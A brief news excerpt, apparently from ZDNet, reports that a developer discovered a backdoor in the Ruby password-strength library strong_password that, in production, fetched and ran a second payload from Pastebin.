From zdnet.com
A diligent developer’s security practices have uncovered a dangerous backdoor in a popular Ruby library for checking the password strength of user-chosen passwords.
The malicious code would check if the library was being used in a test or production environment. When in production, it would download and run a second payload downloaded from Pastebin.com, a text hosting portal.
This second payload would create the actual backdoor in the apps and websites that used the library — named strong_password.